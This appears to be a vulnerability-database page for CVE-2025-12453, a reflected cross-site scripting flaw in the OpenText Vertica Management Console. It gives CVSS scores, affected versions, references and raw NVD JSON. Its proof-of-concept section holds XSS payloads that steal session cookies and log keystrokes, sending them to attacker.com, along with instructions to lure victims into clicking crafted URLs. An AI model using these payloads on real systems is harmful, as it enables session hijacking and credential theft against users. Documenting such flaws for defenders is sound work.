CVE-2025-12453

Description

Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in OpenText™ Vertica allows Reflected XSS. The vulnerability could lead to Reflected XSS attack of cross-site scripting in Vertica management console application.This issue affects Vertica: from 10.0 through 10.X, from 11.0 through 11.X, from 12.0 through 12.X, from 23.0 through 23.X, from 24.0 through 24.X, from 25.1.0 through 25.1.X, from 25.2.0 through 25.2.X, from 25.3.0 through 25.3.X.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:opentext:vertica:*:*:*:*:*:*:*:* - VULNERABLE

Vertica 10.0 - 10.X

Vertica 11.0 - 11.X

Vertica 12.0 - 12.X

Vertica 23.0 - 23.X

Vertica 24.0 - 24.X

Vertica 25.1.0 - 25.1.X

Vertica 25.2.0 - 25.2.X

Vertica 25.3.0 - 25.3.X

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-12453 Reflected XSS PoC for OpenText Vertica -->
<!-- This PoC demonstrates a reflected XSS attack in Vertica Management Console -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-12453 PoC</title>
</head>
<body>
    <h2>CVE-2025-12453 - OpenText Vertica Reflected XSS</h2>
    
    <p><strong>Affected Component:</strong> Vertica Management Console</p>
    <p><strong>Vulnerability:</strong> Reflected Cross-Site Scripting</p>
    <p><strong>CVSS Score:</strong> 6.1 (Medium)</p>
    
    <h3>Attack Scenarios:</h3>
    
    <h4>Scenario 1: Basic Script Injection</h4>
    <p>Malicious URL Pattern:</p>
    <pre id="url1"></pre>
    
    <h4>Scenario 2: Cookie Stealing</h4>
    <p>Malicious URL to steal session cookies:</p>
    <pre id="url2"></pre>
    <p>Attacker-controlled server to receive stolen cookies:</p>
    <pre>https://attacker.com/collect?cookie=</pre>
    
    <h4>Scenario 3: Keylogger Injection</h4>
    <p>Malicious URL to inject keylogger:</p>
    <pre id="url3"></pre>
    
    <h3>Usage Instructions:</h3>
    <ol>
        <li>Replace <code>VICTIM_VERTICA_URL</code> with the target Vertica Management Console URL</li>
        <li>Replace <code>VULNERABLE_PARAMETER</code> with the vulnerable parameter name</li>
        <li>Replace <code>ATTACKER_SERVER</code> with your controlled server</li>
        <li>Social engineer the victim to click the crafted URL</li>
    </ol>
    
    <script>
        // Base URL for Vertica Management Console
        const baseUrl = 'https://VICTIM_VERTICA_URL';
        
        // Example vulnerable parameter (actual parameter varies)
        const vulnParam = 'VULNERABLE_PARAMETER';
        
        // PoC payloads
        const payloads = {
            basicXSS: '<script>alert("XSS")</script>',
            cookieTheft: '<img src=x onerror="fetch(\'https://attacker.com/collect?cookie=\'+document.cookie)">',
            keylogger: '<script>document.onkeypress=function(e){fetch(\'https://attacker.com/log?k=\'+e.key)}</script>'
        };
        
        // Display example URLs
        document.getElementById('url1').textContent = baseUrl + '?' + vulnParam + '=' + encodeURIComponent(payloads.basicXSS);
        document.getElementById('url2').textContent = baseUrl + '?' + vulnParam + '=' + encodeURIComponent(payloads.cookieTheft);
        document.getElementById('url3').textContent = baseUrl + '?' + vulnParam + '=' + encodeURIComponent(payloads.keylogger);
        
        // Detection script
        console.log('[CVE-2025-12453] PoC loaded');
    </script>
    
    <h3>Remediation:</h3>
    <ul>
        <li>Upgrade to Vertica version 25.4.0 or later</li>
        <li>Apply input validation and output encoding</li>
        <li>Implement Content-Security-Policy headers</li>
    </ul>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12453
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12453
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12453/
[4] VulDB https://vuldb.com/cve/CVE-2025-12453
[5] https://portal.microfocus.com/s/article/KM000045852?language=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12453", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:53:47.427", "lastModified": "2026-04-17T15:25:00.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in OpenText™ Vertica allows Reflected XSS. \nThe vulnerability could lead to Reflected XSS attack of cross-site scripting in Vertica management console application.This issue affects Vertica: from 10.0 through 10.X, from 11.0 through 11.X, from 12.0 through 12.X, from 23.0 through 23.X, from 24.0 through 24.X, from 25.1.0 through 25.1.X, from 25.2.0 through 25.2.X, from 25.3.0 through 25.3.X."}, {"lang": "es", "value": "Neutralización incorrecta de la entrada durante la generación de páginas web ('cross-site scripting') vulnerabilidad en OpenText™ Vertica permite XSS Reflejado. La vulnerabilidad podría conducir a un ataque de XSS Reflejado de cross-site scripting en la aplicación de consola de gestión de Vertica. Este problema afecta a Vertica: desde 10.0 hasta 10.X, desde 11.0 hasta 11.X, desde 12.0 hasta 12.X, desde 23.0 hasta 23.X, desde 24.0 hasta 24.X, desde 25.1.0 hasta 25.1.X, desde 25.2.0 hasta 25.2.X, desde 25.3.0 hasta 25.3.X."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "USER", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opentext:vertica:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0-0", "versionEndExcluding": "25.4.0-0", "matchCriteriaId": "985580D2-2949-44DF-AE4B-108FBEACF4F5"}]}]}], "references": [{"url": "https://portal.microfocus.com/s/article/KM000045852?language=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}